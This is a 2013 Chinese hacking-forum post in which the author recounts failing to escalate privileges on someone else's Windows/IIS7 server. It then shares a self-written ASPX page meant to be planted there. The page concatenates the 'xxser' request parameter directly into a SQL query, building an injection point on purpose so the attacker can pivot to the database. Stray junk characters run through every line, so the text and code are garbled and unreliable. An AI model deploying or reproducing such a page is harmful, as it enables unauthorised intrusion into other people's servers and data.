昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。! T% c8 z* Y$ e) v# z$ N8 J9 {0 ]4 G8 I M
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。0 @4 P% H% h/ }1 u+ O) m$ d. B
代码量不多,自己写个拉倒了。烦死了。& g# r6 _* G# h9 `2 Y4 Q* a
! @* ?; ~' N" J) _
8 s+ ]6 H0 e$ M' ^. S
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">4 y' x9 T6 q) Y
<html xmlns="http://www.w3.org/1999/xhtml">5 B6 z! Y# _" v) \0 U u
<head runat="server">; L" M; u7 q+ E
<title>暗影aspx构造注射专用页面</title> Z9 Z) w+ |+ {1 g1 A
</head>
7 d9 [" U' @! R: u/ a1 E<body>
0 [4 v. B3 s6 v! \ <form id="form1" runat="server">
: L- B$ x3 ]9 j* A l9 c. ` <div>: l1 E# K7 ?1 L
<script language="c#" runat="server">& p5 n! L1 P: n% L4 E: f
% W1 E3 I5 e1 M" n( M5 p
void page_init(object sender, EventArgs e)6 X- E1 G8 _ q) Q
{
' [; Q! P& z8 K& ] ; O$ X' Z% V* D, Y8 F
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
3 u$ O$ n* R5 f8 V& `7 R, `% F: M
7 x2 C K q& X4 |- w; a$ s conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();, n) [7 C) x* i9 N: v& e
conn.Open();5 ?' l) q( j: j1 n) W( D% i
( l' C. E3 ~+ ]0 f
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1" ]$ u8 ~. g9 i4 T
' ~3 F q6 q4 s" I: D9 E' y System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
7 Y! x7 |* X/ T# z" N int x = command.ExecuteNonQuery();
% ^9 A# K5 z; u4 l2 O @# X Response.Write(i+"\n");
( i' p @$ k! A& o( @$ U. ?9 T9 i Response.Write(x);
0 w! a; ^$ W7 O$ t( E conn.Close();
J+ ?$ @( S( X& t; f8 K8 }1 z! e7 e }! [# O3 J- m$ ~: D
, d: A. T# r- z& v/ a$ e! v
</script>5 d0 W) l4 B% N+ k: P" k: ?9 q
</div>7 H" b7 z j# {
</form>$ g8 t# A3 L" d6 J5 c W+ e0 U
</body>
8 n" L& J) u1 B" r0 o</html>
* q. N7 O3 D, Q7 }* f3 A |
发表于 2013-3-20 21:32:01
收藏
分享
支持
反对